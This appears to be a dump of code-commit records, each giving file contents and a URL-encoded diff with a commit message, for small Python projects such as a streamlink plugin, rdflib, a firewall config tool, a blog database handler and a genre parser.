self.meta_name = meta_name
self.state_dir = os.path.join(base_dir, self.meta_name)
self.state_lock = os.path.join(base_dir, "%s.lock" % self.meta_name)
self.state_file = os.path.join(self.state_dir, filename)
self.state = {
"name": config.backup.name,
"path": base_dir,
"state_version": state_version
}
self.lock = Lock(self.state_lock, False)
if not os.path.isdir(self.state_dir):
# try recursive first, fallback to regular mkdir
try:
os.makedirs(self.state_dir)
except:
try:
os.mkdir(self.state_dir)
except Exception, e:
raise OperationError(e)
def merge(self, new, old):
merged = old.copy()
merged.update(new)
return merged
def load(self, load_one=False):
f = None
try:
f = open(self.state_file, "r")
data = decode_all(f.read())
if load_one and len(data) > 0:
return data[0]
return data
except Exception, e:
raise e
finally:
if f:
f.close()
def write(self, do_merge=False):
f = None
try:
self.lock.acquire()
if do_merge and os.path.isfile(self.state_file):
curr = self.load(True)
data = self.merge(self.state, curr)
f = open(self.state_file, 'w+')
logging.debug("Writing %s state file: %s" % (self.__class__.__name__, self.state_file))
self.state['updated_at'] = int(time())
f.write(BSON.encode(self.state))
finally:
if f:
f.close()
self.lock.release()
class StateBaseReplset(StateBase):
def __init__(self, base_dir, config, backup_time, set_name, filename):
StateBase.__init__(self, base_dir, config, filename)
self.state['backup'] = True
self.state['backup_name'] = backup_time
self.state['replset'] = set_name
def load_state(self, replset):
self.state = self.merge(replset, self.state)
class StateBackupReplset(StateBaseReplset):
def __init__(self, base_dir, config, backup_time, set_name):
StateBaseReplset.__init__(self, base_dir, config, backup_time, set_name, "replset.bson")
class StateOplog(StateBaseReplset):
def __init__(self, base_dir, config, backup_time, set_name):
StateBaseReplset.__init__(self, base_dir, config, backup_time, set_name, "oplog.bson")
class StateBackup(StateBase):
def __init__(self, base_dir, config, backup_time, seed_uri, argv=None):
StateBase.__init__(self, base_dir, config)
self.base_dir = base_dir
self.state['backup'] = True
self.state['name'] = backup_time
self.state['method'] = config.backup.method
self.state['path'] = base_dir
self.state['cmdline'] = argv
self.state['config'] = config.dump()
self.state['version'] = config.version
self.state['git_commit'] = config.git_commit
self.state['host'] = {
'hostname': platform.node(),
'uname': platform.uname(),
'python': {
'build': platform.python_build(),
'version': platform.python_version()
}
}
self.state['seed'] = {
'uri': seed_uri.str(),
'replset': seed_uri.replset
}
self.init()
def init(self):
logging.info("Initializing backup state directory: %s" % self.base_dir)
def set(self, name, summary):
self.state[name] = summary
self.write(True)
class StateRoot(StateBase):
def __init__(self, base_dir, config):
StateBase.__init__(self, base_dir, config)
self.base_dir = base_dir
self.state['root'] = True
self.init()
def init(self):
logging.info("Initializing root state directory %s" % self.base_dir)
self.load_backups()
def load_backups(self):
backups = []
if os.path.isdir(self.base_dir):
for subdir in os.listdir(self.base_dir):
try:
bkp_path = os.path.join(self.base_dir, subdir)
if subdir == self.meta_name or os.path.islink(bkp_path):
continue
state_path = os.path.join(bkp_path, self.meta_name)
state_file = os.path.join(state_path, "meta.bson")
done_path = os.path.join(state_path, "done.bson")
if os.path.isdir(state_path) and os.path.isfile(state_file) and os.path.isfile(done_path):
backups.append(state_file)
except:
continue
logging.info("Found %i existing completed backups for set" % len(backups))
return backups
class StateDoneStamp(StateBase):
def __init__(self, base_dir, config):
StateBase.__init__(self, base_dir, config, "done.bson")
self.state = {'done': True}
|
Python
| 0.999999
|
@@ -879,17 +879,20 @@
try
-recursive
+normal mkdir
fir
@@ -913,19 +913,46 @@
o re
-gular mkdir
+cursive mkdir if there is an exception
%0A
@@ -989,15 +989,12 @@
os.m
-ake
+k
dir
-s
(sel
@@ -1063,36 +1063,39 @@
os.m
-k
+ake
dir
+s
(self.state_dir)
|
471d1d4ae197c7643eeac374a0353adbce54fd44
|
add scheme to grabber api url if not present
|
src/streamlink/plugins/nineanime.py
|
src/streamlink/plugins/nineanime.py
|
import re
from streamlink.plugin import Plugin
from streamlink.plugin.api import http
from streamlink.plugin.api import validate
from streamlink.stream import HTTPStream
class NineAnime(Plugin):
_episode_info_url = "http://9anime.to/ajax/episode/info"
_info_schema = validate.Schema({
"grabber": validate.url(),
"params": {
"id": validate.text,
"token": validate.text,
"options": validate.text,
}
})
_streams_schema = validate.Schema({
"token": validate.text,
"error": None,
"data": [{
"label": validate.text,
"file": validate.url(),
"type": "mp4"
}]
})
_user_agent = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) "\
"Chrome/36.0.1944.9 Safari/537.36"
_url_re = re.compile(r"https?://9anime.to/watch/(?:[^.]+?\.)(\w+)/(\w+)")
@classmethod
def can_handle_url(cls, url):
return cls._url_re.match(url) is not None
def _get_streams(self):
match = self._url_re.match(self.url)
film_id, episode_id = match.groups()
headers = {
"Referer": self.url,
"User-Agent": self._user_agent
}
# Get the info about the Episode, including the Grabber API URL
info_res = http.get(self._episode_info_url,
params=dict(update=0, film=film_id, id=episode_id),
headers=headers)
info = http.json(info_res, schema=self._info_schema)
# Get the data about the streams from the Grabber API
stream_list_res = http.get(info["grabber"], params=info["params"], headers=headers)
stream_data = http.json(stream_list_res, schema=self._streams_schema)
for stream in stream_data["data"]:
yield stream["label"], HTTPStream(self.session, stream["file"])
__plugin__ = NineAnime
|
Python
| 0
|
@@ -79,16 +79,61 @@
rt http%0A
+from streamlink.plugin.api import useragents%0A
from str
@@ -208,16 +208,55 @@
PStream%0A
+from streamlink.compat import urlparse%0A
%0A%0Aclass
@@ -303,13 +303,8 @@
= %22
-http:
//9a
@@ -783,154 +783,8 @@
%7D)%0A%0A
- _user_agent = %22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) %22%5C%0A %22Chrome/36.0.1944.9 Safari/537.36%22%0A
@@ -960,16 +960,227 @@
t None%0A%0A
+ def add_scheme(self, url):%0A # update the scheme for the grabber url if required%0A if url.startswith(%22//%22):%0A url = %22%7B0%7D:%7B1%7D%22.format(urlparse(self.url).scheme, url)%0A return url%0A%0A
def
@@ -1373,24 +1373,26 @@
t%22:
-self._
user
-_
agent
+s.FIREFOX
%0A
@@ -1504,16 +1504,32 @@
et(self.
+add_scheme(self.
_episode
@@ -1537,16 +1537,17 @@
info_url
+)
,%0A
@@ -1789,16 +1789,71 @@
ber API%0A
+ grabber_url = self.add_scheme(info%5B%22grabber%22%5D)%0A
@@ -1879,31 +1879,27 @@
ttp.get(
-info%5B%22
grabber
-%22%5D
+_url
, params
|
d965740b6e0021686b284d164a1eddd17519244a
|
set version to 4.2.0 for release
|
rdflib/__init__.py
|
rdflib/__init__.py
|
"""\
A pure Python package providing the core RDF constructs.
The packages is intended to provide the core RDF types and interfaces
for working with RDF. The package defines a plugin interface for
parsers, stores, and serializers that other packages can use to
implement parsers, stores, and serializers that will plug into the
rdflib package.
The primary interface `rdflib` exposes to work with RDF is
`rdflib.graph.Graph`.
A tiny example:
>>> import rdflib
>>> g = rdflib.Graph()
>>> result = g.parse("http://www.w3.org/2000/10/swap/test/meet/blue.rdf")
>>> print("graph has %s statements." % len(g))
graph has 9 statements.
>>>
>>> for s, p, o in g:
... if (s, p, o) not in g:
... raise Exception("It better be!")
>>> s = g.serialize(format='n3')
"""
__docformat__ = "restructuredtext en"
# The format of the __version__ line is matched by a regex in setup.py
__version__ = "4.2.0-dev"
__date__ = "2015/01/07"
__all__ = [
'URIRef',
'BNode',
'Literal',
'Variable',
'Namespace',
'Dataset',
'Graph',
'ConjunctiveGraph',
'RDF',
'RDFS',
'OWL',
'XSD',
'util',
]
import sys
assert sys.version_info >= (2, 5, 0), "rdflib requires Python 2.5 or higher"
del sys
import logging
import __main__
if not hasattr(__main__, '__file__'):
# show log messages in interactive mode
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
logger.info("RDFLib Version: %s" % __version__)
try:
unichr(0x10FFFF)
except ValueError:
import warnings
warnings.warn(
'You are using a narrow Python build!\n'
'This means that your Python does not properly support chars > 16bit.\n'
'On your system chars like c=u"\\U0010FFFF" will have a len(c)==2.\n'
'As this can cause hard to debug problems with string processing\n'
'(slicing, regexp, ...) later on, we strongly advise to use a wide\n'
'Python build in production systems.',
ImportWarning)
del warnings
NORMALIZE_LITERALS = True
"""
If True - Literals lexical forms are normalized when created.
I.e. the lexical forms is parsed according to data-type, then the
stored lexical form is the re-serialized value that was parsed.
Illegal values for a datatype are simply kept. The normalized keyword
for Literal.__new__ can override this.
For example:
>>> from rdflib import Literal,XSD
>>> Literal("01", datatype=XSD.int)
rdflib.term.Literal(u'1', datatype=rdflib.term.URIRef(u'http://www.w3.org/2001/XMLSchema#integer'))
This flag may be changed at any time, but will only affect literals
created after that time, previously created literals will remain
(un)normalized.
"""
DAWG_LITERAL_COLLATION = False
"""
DAWG_LITERAL_COLLATION determines how literals are ordered or compared
to each other.
In SPARQL, applying the >,<,>=,<= operators to literals of
incompatible data-types is an error, i.e:
Literal(2)>Literal('cake') is neither true nor false, but an error.
This is a problem in PY3, where lists of Literals of incompatible
types can no longer be sorted.
Setting this flag to True gives you strict DAWG/SPARQL compliance,
setting it to False will order Literals with incompatible datatypes by
datatype URI
In particular, this determines how the rich comparison operators for
Literal work, eq, __neq__, __lt__, etc.
"""
from rdflib.term import (
URIRef, BNode, Literal, Variable)
from rdflib.namespace import Namespace
from rdflib.graph import Dataset, Graph, ConjunctiveGraph
from rdflib.namespace import RDF, RDFS, OWL, XSD
from rdflib import plugin
from rdflib import query
# tedious sop to flake8
assert plugin
assert query
from rdflib import util
|
Python
| 0
|
@@ -941,12 +941,8 @@
.2.0
--dev
%22%0A__
@@ -961,12 +961,12 @@
15/0
-1/07
+2/19
%22%0A%0A_
|
bbbddd3d505f18759b509442238cd492f420a142
|
Fix ordered_dict_merge rename error
|
fwgen/fwgen_cmd.py
|
fwgen/fwgen_cmd.py
|
import argparse
import signal
import sys
import subprocess
from collections import OrderedDict
from pkg_resources import resource_filename
import yaml
import fwgen
# Python 2.7 compatibility
try:
input = raw_input
except NameError:
pass
class TimeoutExpired(Exception):
pass
def alarm_handler(signum, frame):
raise TimeoutExpired
def wait_for_input(message, timeout):
signal.signal(signal.SIGALRM, alarm_handler)
signal.alarm(timeout)
try:
return input(message)
finally:
# Cancel alarm
signal.alarm(0)
def ordered_dict_merge(d1, d2):
"""
Deep merge d1 into d2
"""
for k, v in d1.items():
if isinstance(v, OrderedDict):
node = d2.setdefault(k, OrderedDict())
dict_merge(v, node)
else:
d2[k] = v
return d2
def yaml_load_ordered(stream, Loader=yaml.Loader, object_pairs_hook=OrderedDict):
class OrderedLoader(Loader):
pass
def construct_mapping(loader, node):
loader.flatten_mapping(node)
return object_pairs_hook(loader.construct_pairs(node))
OrderedLoader.add_constructor(
yaml.resolver.BaseResolver.DEFAULT_MAPPING_TAG,
construct_mapping)
return yaml.load(stream, OrderedLoader)
def _main():
parser = argparse.ArgumentParser()
parser.add_argument('--config', metavar='PATH', help='Override path to config file')
parser.add_argument('--defaults', metavar='PATH', help='Override path to defaults file')
parser.add_argument(
'--with-reset',
action='store_true',
help='Clear the firewall before reapplying. Recommended only if ipsets in '
'use are preventing you from applying the new configuration.'
)
mutex_group = parser.add_mutually_exclusive_group()
mutex_group.add_argument('--timeout', metavar='SECONDS', type=int,
help='Override timeout for rollback')
mutex_group.add_argument(
'--no-confirm',
action='store_true',
help="Don't ask for confirmation before storing ruleset"
)
args = parser.parse_args()
defaults = resource_filename(__name__, 'etc/defaults.yml')
if args.defaults:
defaults = args.defaults
user_config = '/etc/fwgen/config.yml'
if args.config:
user_config = args.config
try:
with open(defaults, 'r') as f:
config = yaml_load_ordered(f)
with open(user_config, 'r') as f:
config = ordered_dict_merge(yaml_load_ordered(f), config)
except FileNotFoundError as e:
print('ERROR: %s' % e)
sys.exit(3)
fw = fwgen.FwGen(config)
if args.with_reset:
fw.reset()
if args.no_confirm:
fw.commit()
else:
timeout = 30
if args.timeout:
timeout = args.timeout
print('\nRolling back in %d seconds if not confirmed.\n' % timeout)
fw.apply()
message = ('The ruleset has been applied successfully! Press \'Enter\' to make the '
'new ruleset persistent.\n')
try:
wait_for_input(message, timeout)
fw.save()
except (TimeoutExpired, KeyboardInterrupt):
print('No confirmation received. Rolling back...\n')
fw.rollback()
def main():
try:
sys.exit(_main())
except subprocess.CalledProcessError as e:
print('ERROR: %s' % e)
sys.exit(1)
except fwgen.InvalidChain as e:
print('ERROR: %s' % e)
sys.exit(2)
except KeyboardInterrupt:
print('ERROR: Aborted by user!')
sys.exit(130)
|
Python
| 0.000001
|
@@ -764,16 +764,24 @@
+ordered_
dict_mer
|
566e3e9140ef96d58aaa4bfc0f89d9429a978485
|
add a script to get connections between the minima
|
get_connections.py
|
get_connections.py
|
Python
| 0
|
@@ -0,0 +1,626 @@
+from lj_run import LJClusterNew%0Aimport sys%0Afrom pygmin.landscape import Graph%0A%0Anatoms = int(sys.argv%5B1%5D)%0Adbname = sys.argv%5B2%5D%0A%0Asystem = LJClusterNew(natoms)%0Adb = system.create_database(dbname)%0A%0Awhile True:%0A min1 = db.minima()%5B0%5D%0A%0A graph = Graph(db)%0A%0A all_connected = True%0A for m2 in db.minima()%5B1:%5D:%0A if not graph.areConnected(min1, m2):%0A all_connected = False%0A break%0A if all_connected:%0A print %22minima are all connected, ending%22%0A exit(1) %0A%0A connect = system.get_double_ended_connect(min1, m2, db, fresh_connect=True, load_no_distances=True)%0A connect.connect()%0A%0A%0A
|
|
72b701652271178e08d9cccd088d24177d4a2fc6
|
Add functions for storing/getting blogs and posts
|
pyblogit/database_handler.py
|
pyblogit/database_handler.py
|
Python
| 0
|
@@ -0,0 +1,2237 @@
+%22%22%22%0Apyblogit.database_handler%0A~~~~~~~~~~~~~~~~~~~~~~~~~%0A%0AThis module handles the connection and manipulation of the local database.%0A%22%22%22%0Aimport sqlite3%0A%0A%0Adef get_cursor(blog_id):%0A %22%22%22Connects to a local sqlite database%22%22%22%0A conn = sqlite3.connect(blog_id)%0A c = conn.cursor()%0A%0A return c%0A%0A%0Adef add_blog(blog_id, blog_name):%0A %22%22%22Adds a new blog to the local blogs database and%0A creates a new database for the blog.%22%22%22%0A # These two statements create the database files if%0A # they don't exist.%0A c = get_cursor('blogs')%0A blog_c = get_cursor(blog_id)%0A%0A # Check if blogs table exists, if it doesn't create it.%0A exists = bool(c.execute('SELECT name FROM sqlite_master WHERE type=%22table%22%0A AND name=%22blogs%22'))%0A%0A if not exists:%0A c.execute('CREATE TABLE blogs(blog_id INT, blog_name TEXT)')%0A%0A sql = ('INSERT INTO blogs(blog_id, blog_name) values(%7Bblog_id%7D,%0A %7Bblog_name%7D)'.format(blog_id=blog_id, blog_name=blog_name))%0A%0A c.execute(sql)%0A%0A # Create table to store posts in new blog's database.%0A blog_c.execute('CREATE TABLE posts(post_id INT, title TEXT, url TEXT,%0A status TEXT, content TEXT, updated INT)')%0A%0A%0Adef get_blogs():%0A %22%22%22Returns all stored blogs.%22%22%22%0A c = get_cursor('blogs')%0A blogs = c.execute('SELECT * FROM blogs')%0A%0A return blogs%0A%0A%0Adef get_post(blog_id, post_id):%0A %22%22%22Retrieves a post from a local database.%22%22%22%0A c = get_cursor(blog_id)%0A sql = 'SELECT * FROM posts WHERE post_id = %7Bp_id%7D'.format(p_id=post_id)%0A%0A c.execute(sql)%0A%0A post = c.fetchone()%0A%0A return post%0A%0A%0Adef get_posts(blog_id, limit=None):%0A %22%22%22Retrieves all the posts from a local database, if a limit%0A is specified, it will retrieve up to that amount of posts.%22%22%22%0A c = get_cursor(blog_id)%0A sql = 'SELECT * FROM posts'%0A%0A if limit:%0A limit = 'LIMIT %7Blim%7D'.format(lim=limit)%0A sql = ''.join(%5Bsql, 
limit%5D)%0A%0A c.execute(sql)%0A%0A posts = c.fetchall()%0A%0A return posts%0A%0A%0Adef update_post(blog_id, post_id, post):%0A # TODO: update post in local database%0A pass%0A%0A%0Adef add_post(blog_id, post):%0A # TODO: insert new post in local database%0A pass%0A
|
|
726316b50209dfc5f6a8f6373cd7e3f53e267bb3
|
Implement a genre string parser
|
geodj/genre_parser.py
|
geodj/genre_parser.py
|
Python
| 0.999999
|
@@ -0,0 +1,1102 @@
+import re%0Afrom django.utils.encoding import smart_str%0A%0Aclass GenreParser:%0A @staticmethod%0A def parse(genre):%0A genre = smart_str(genre).lower()%0A if re.search(r%22%5Cb(jazz%7Cblues)%5Cb%22, genre):%0A return %22jazz%22%0A if re.search(r%22%5Cb(ska%7Creggae%7Cragga%7Cdub)%5Cb%22, genre):%0A return %22ska%22%0A elif re.search(r%22%5Cb(r&b%7Cfunk%7Csoul)%5Cb%22, genre):%0A return %22r&b%22%0A elif re.search(r%22%5Cbfolk%5Cb%22, genre):%0A return %22folk%22%0A elif re.search(r%22%5Cb(country%7Cbluegrass)%5Cb%22, genre):%0A return %22country%22%0A elif re.search(r%22%5Cb(rap%7Chip hop%7Ccrunk%7Ctrip hop)%5Cb%22, genre):%0A return %22hiphop%22%0A elif re.search(r%22%5Cbpop%5Cb%22, genre):%0A return %22pop%22%0A elif re.search(r%22%5Cb(rock%7Cmetal%7Cpunk)%5Cb%22, genre):%0A return %22rock%22%0A elif re.search(r%22%5Cb(electronic%7Celectronica%7Celectro%7Chouse%7Ctechno%7Cambient%7Cchiptune%7Cindustrial%7Cdowntempo%7Cdrum and bass%7Ctrance%7Cdubstep)%5Cb%22, genre):%0A return %22electronic%22%0A elif re.search(r%22%5Cb(classical%7Corchestra%7Copera%7Cpiano%7Cviolin%7Ccello)%5Cb%22, genre):%0A return %22classical%22%0A
|
|
23402487a2b12aca391bb5958b4ba3e9424a6801
|
Add a new management command 'olccperiodic' to update the 'on_sale' property for all products.
|
django_olcc/olcc/management/commands/olccperiodic.py
|
django_olcc/olcc/management/commands/olccperiodic.py
|
Python
| 0
|
@@ -0,0 +1,2127 @@
+import datetime%0A%0Afrom django.core.management.base import BaseCommand%0Afrom django.db import IntegrityError, transaction%0Afrom olcc.models import Product, ProductPrice%0Afrom optparse import make_option%0A%0Aclass Command(BaseCommand):%0A help = %22%22%22%5C%0A A command to be run periodically to calculate Product status%0A from updated price data.%0A%0A Currently this command iterates over all product records and%0A toggles the 'on_sale' property if the item's price has dropped%0A since last month.%22%22%22%0A%0A option_list = BaseCommand.option_list + (%0A make_option('--quiet', action='store_true', dest='quiet',%0A default=False, help='Suppress all output except errors'),%0A )%0A%0A def uprint(self, msg):%0A %22%22%22%0A Unbuffered print.%0A %22%22%22%0A if not self.quiet:%0A self.stdout.write(%22%25s%5Cn%22 %25 msg)%0A self.stdout.flush()%0A%0A @transaction.commit_on_success%0A def handle(self, *args, **options):%0A self.quiet = options.get('quiet', False)%0A%0A # Get today's date%0A today = datetime.date.today()%0A%0A # Get the first of this month%0A this_month = today.replace(day=1)%0A%0A # Get the first of last month%0A try:%0A last_month = today.replace(month=today.month-1, day=1)%0A except ValueError:%0A if today.month == 1:%0A last_month = today.replace(year=today.year-1, month=12, day=1)%0A%0A # Update the on sale flag for all products%0A count = 0%0A for p in Product.objects.all().order_by('title'):%0A try:%0A current_price = p.prices.get(effective_date=this_month)%0A previous_price = p.prices.get(effective_date=last_month)%0A%0A if current_price.amount %3C previous_price.amount:%0A p.on_sale = True%0A%0A self.uprint('%5BSALE%5D: %25s' %25 p)%0A count += 1%0A else:%0A p.on_sale = False%0A%0A # Persist our changes%0A p.save()%0A except ProductPrice.DoesNotExist:%0A pass%0A%0A self.uprint('%5Cn%25s items have dropped in price!' %25 count)%0A
|
|
860d81ec5f0b9ae4c28a1996773c06240c31b67a
|
Update names
|
canvas.py
|
canvas.py
|
Python
| 0.000001
|
@@ -0,0 +1,1476 @@
+#!/usr/bin/env python3%0Afrom tkinter import *%0Afrom tkinter import ttk%0Aimport math%0A%0Aclass App:%0A def __init__(self):%0A self.lastx = 0%0A self.lasty = 0%0A self.fill = 'red'%0A self.width = 2%0A%0A root = Tk()%0A root.columnconfigure(0, weight=1)%0A root.rowconfigure(0, weight=1)%0A%0A self.canvas = Canvas(root)%0A self.canvas.grid(column=0, row=0, sticky=(N, W, E, S))%0A self.canvas.bind(%22%3CButton-1%3E%22, self.xy)%0A self.canvas.bind(%22%3CB1-Motion%3E%22, self.addLine)%0A%0A # with Windows%0A self.canvas.bind(%22%3CMouseWheel%3E%22, self.changeWidth)%0A # with Linux OS%0A self.canvas.bind(%22%3CButton-4%3E%22, self.changeWidth)%0A self.canvas.bind(%22%3CButton-5%3E%22, self.changeWidth)%0A%0A root.mainloop()%0A%0A def xy(self, event):%0A self.lastx, self.lasty = event.x, event.y%0A%0A def changeWidth(self, event):%0A # Why?%0A if event.num == 5 or event.delta == -120:%0A self.width = max(1, self.width - 1)%0A # Why? What is the significance of 4 and 5?%0A if event.num == 4 or event.delta == 120:%0A self.width = min(500, self.width + 1)%0A%0A def addLine(self, event):%0A if self.fill == 'red':%0A self.fill = 'blue'%0A else:%0A self.fill = 'red'%0A self.canvas.create_line(%0A self.lastx, self.lasty, event.x, event.y,%0A fill=self.fill, width=math.floor(self.width))%0A self.lastx, self.lasty = event.x, event.y%0A%0AApp()%0A
|
|
d5c7d429be93a2b2de4a1c09bd73f72c02664499
|
Move win32 audio experiment to trunk.
|
experimental/directshow.py
|
experimental/directshow.py
|
Python
| 0
|
@@ -0,0 +1,1524 @@
+#!/usr/bin/python%0D%0A# $Id:$%0D%0A%0D%0A# Play an audio file with DirectShow. Tested ok with MP3, WMA, MID, WAV, AU.%0D%0A# Caveats:%0D%0A# - Requires a filename (not from memory or stream yet). Looks like we need%0D%0A# to manually implement a filter which provides an output IPin. Lot of%0D%0A# work.%0D%0A# - Theoretically can traverse the graph to get the output filter, which by%0D%0A# default is supposed to implement IDirectSound3DBuffer, for positioned%0D%0A# sounds. Untested.%0D%0A# - Requires comtypes. Can work around this in future by implementing the%0D%0A# small subset of comtypes ourselves (or including a snapshot of comtypes in%0D%0A# pyglet).%0D%0A%0D%0Aimport ctypes%0D%0Afrom comtypes import client%0D%0Aimport sys%0D%0Aimport time%0D%0A%0D%0Afilename = sys.argv%5B1%5D%0D%0A%0D%0Aqedit = client.GetModule('qedit.dll') # DexterLib%0D%0Aquartz = client.GetModule('quartz.dll') # %0D%0A%0D%0ACLSID_FilterGraph = '%7Be436ebb3-524f-11ce-9f53-0020af0ba770%7D'%0D%0A%0D%0Afilter_graph = client.CreateObject(CLSID_FilterGraph,%0D%0A interface=qedit.IFilterGraph)%0D%0Afilter_builder = filter_graph.QueryInterface(qedit.IGraphBuilder)%0D%0Afilter_builder.RenderFile(filename, None)%0D%0A%0D%0Amedia_control = filter_graph.QueryInterface(quartz.IMediaControl)%0D%0Amedia_control.Run()%0D%0A%0D%0Atry:%0D%0A # Look at IMediaEvent interface for EOS notification%0D%0A while True:%0D%0A time.sleep(1)%0D%0Aexcept KeyboardInterrupt:%0D%0A pass%0D%0A%0D%0A# Need these because finalisers don't have enough context to clean up after%0D%0A# themselves when script exits.%0D%0Adel media_control%0D%0Adel filter_builder%0D%0Adel filter_graph%0D%0A
|
|
285c852bb246042a4f882ab9ca2948e4f0241dac
|
add GTC.meshgrid Core
|
src/processors/GTC/meshgrid.py
|
src/processors/GTC/meshgrid.py
|
Python
| 0.000001
|
@@ -0,0 +1,1838 @@
+# -*- coding: utf-8 -*-%0A%0A# Copyright (c) 2018 shmilee%0A%0A'''%0ASource fortran code:%0A%0Av110922%0A-------%0A%0Adiagnosis.F90, subroutine diagnosis:37-50%0A !!diagnosis xy%0A if(mype==1)then%0A open(341,file='meshgrid.out',status='replace')%0A do i=0,mpsi%0A write(341,*)psimesh(i)%0A write(341,*)sprpsi(psimesh(i))%0A write(341,*)qmesh(i)%0A write(341,*)kapatmti(i)%0A write(341,*)kapatmte(i)%0A write(341,*)kapatmni(i)%0A write(341,*)kapatmne(i)%0A enddo%0A close(341)%0A endif%0A%0A'''%0A%0Aimport numpy%0Afrom ..basecore import BaseCore, log%0A%0A__all__ = %5B'MeshgridCoreV110922'%5D%0A%0A%0Aclass MeshgridCoreV110922(BaseCore):%0A '''%0A Meshgrid data%0A%0A 1) psimesh, sprpsi, qmesh, kapatmti, kapatmte, kapatmni, kapatmne%0A Shape of the array data is (mpsi+1,).%0A '''%0A __slots__ = %5B%5D%0A instructions = %5B'dig'%5D%0A filepatterns = %5B'%5E(?P%3Cgroup%3Emeshgrid)%5C.out$',%0A '.*/(?P%3Cgroup%3Emeshgrid)%5C.out$'%5D%0A grouppattern = '%5Emeshgrid$'%0A _datakeys = (%0A 'psimesh', 'sprpsi', 'qmesh',%0A 'kapatmti', 'kapatmte', 'kapatmni', 'kapatmne')%0A%0A def _dig(self):%0A '''Read 'meshgrid.out'.'''%0A with self.rawloader.get(self.file) as f:%0A log.ddebug(%22Read file '%25s'.%22 %25 self.file)%0A outdata = f.readlines()%0A%0A sd = %7B%7D%0A shape = (7, len(outdata) // 7)%0A outdata = outdata%5B:len(outdata) // 7 * 7%5D%0A if len(outdata) %25 7 != 0:%0A log.warn(%22Missing some raw data in '%25s'! Guess the shape '%25s'.%22%0A %25 (self.file, shape))%0A%0A log.debug(%22Filling datakeys: %25s ...%22 %25 str(self._datakeys%5B:%5D))%0A outdata = numpy.array(%5Bfloat(n.strip()) for n in outdata%5D)%0A outdata = outdata.reshape(shape, order='F')%0A for i, key in enumerate(self._datakeys):%0A sd.update(%7Bkey: outdata%5Bi%5D%7D)%0A%0A return sd%0A
|
|
e731bfdabbf42b636b02e93ccd3b67c55a28d213
|
add unit test
|
axelrod/tests/test_appeaser.py
|
axelrod/tests/test_appeaser.py
|
Python
| 0.000001
|
@@ -0,0 +1,579 @@
+%22%22%22%0ATest for the appeaser strategy%0A%22%22%22%0Aimport unittest%0Aimport axelrod%0A%0Aclass TestAppeaser(unittest.TestCase):%0A%0A def test_strategy(self):%0A P1 = axelrod.Appeaser()%0A P2 = axelrod.Player()%0A%09P1.str = 'C';%0A self.assertEqual(P1.strategy(P2), 'C')%0A%09P1.history = %5B'C'%5D%0A%09P1.history = %5B'C'%5D%0A%09self.assertEqual(P1.strategy(P2), 'C')%0A P1.history = %5B'C', 'D', 'C'%5D%0A P2.history = %5B'C', 'C', 'D'%5D%0A self.assertEqual(P1.strategy(P2), 'D')%0A%0A def test_representation(self):%0A P1 = axelrod.Appeaser()%0A self.assertEqual(str(P1), 'Appeaser')%0A
|
|
0a0d31077746e69bf5acc7d90fa388e121544339
|
Add skeleton for new python scripts.
|
script_skeleton.py
|
script_skeleton.py
|
Python
| 0
|
@@ -0,0 +1,982 @@
+#!/usr/bin/python%0A%0A%22%22%22Usage:%0A %3CSCRIPT_NAME%3E %5B--log-level=%3Clog-level%3E%5D%0A%0A-h --help%0A Show this message.%0A-v --version%0A Show version.%0A--log-level=%3Clog-level%3E%0A Set logging level (one of %7Blog_level_vals%7D) %5Bdefault: info%5D.%0A%22%22%22%0A%0Aimport docopt%0Aimport ordutils.log as log%0Aimport ordutils.options as opt%0Aimport schema%0Aimport sys%0A%0ALOG_LEVEL = %22--log-level%22%0ALOG_LEVEL_VALS = str(log.LEVELS.keys())%0A%0A%0Adef validate_command_line_options(options):%0A # Validate command-line options%0A try:%0A opt.validate_dict_option(%0A options%5BLOG_LEVEL%5D, log.LEVELS, %22Invalid log level%22)%0A except schema.SchemaError as exc:%0A exit(exc.code)%0A%0A%0Adef main(docstring):%0A # Read in and validate command line options%0A options = docopt.docopt(docstring, version=%22%3CSCRIPT_NAME%3E v0.1%22)%0A validate_command_line_options(options)%0A%0A # Set up logger%0A logger = log.getLogger(sys.stderr, options%5BLOG_LEVEL%5D)%0A%0A # Rest of script...%0A%0A%0Aif __name__ == %22__main__%22:%0A main(__doc__)%0A
|
|
63b954c952dda9d123e6fa1e348babae97523e21
|
Create securitygroup.py
|
azurecloudify/securitygroup.py
|
azurecloudify/securitygroup.py
|
Python
| 0.000001
|
@@ -0,0 +1 @@
+%0A
|
|
ac78f3f774dbfda4e2c96786ddebf74066a56f54
|
add mtbf_job_runner
|
mtbf_job_runner.py
|
mtbf_job_runner.py
|
Python
| 0.000004
|
@@ -0,0 +1,573 @@
+#!/usr/bin/env python%0Aimport combo_runner.action_decorator%0Afrom combo_runner.base_action_runner import BaseActionRunner%0Afrom utils.zip_utils import modify_zipfile%0Aimport os%0A%0A%0Aclass MtbfJobRunner(BaseActionRunner):%0A%0A action = combo_runner.action_decorator.action%0A%0A def pre_flash(self):%0A pass%0A%0A def flash(self):%0A pass%0A%0A def post_flash(self):%0A pass%0A%0A# @action%0A def add_7mobile_action(self, action=False):%0A # require import gaia_data_layer to call setSettings%0A%0A%0A%0Aif __name__ == '__main__':%0A MtbfJobRunner().add_7mobile_action()%0A
|
|
f5bb497960f9f9256cc9794baf0c53c4ba5d734f
|
Add Spider class for web crawling.
|
Spider.py
|
Spider.py
|
Python
| 0
|
@@ -0,0 +1,112 @@
+'''%0D%0ACreated on 7/07/2016%0D%0A%0D%0A@author: garet%0D%0A'''%0D%0A%0D%0Aclass Spider():%0D%0A %0D%0A def __init__(self):%0D%0A pass
|
|
8c8d28e95cf99f8aff4ba45819b08995ef63ea44
|
add hubble
|
hubble.py
|
hubble.py
|
Python
| 0.998455
|
@@ -0,0 +1,977 @@
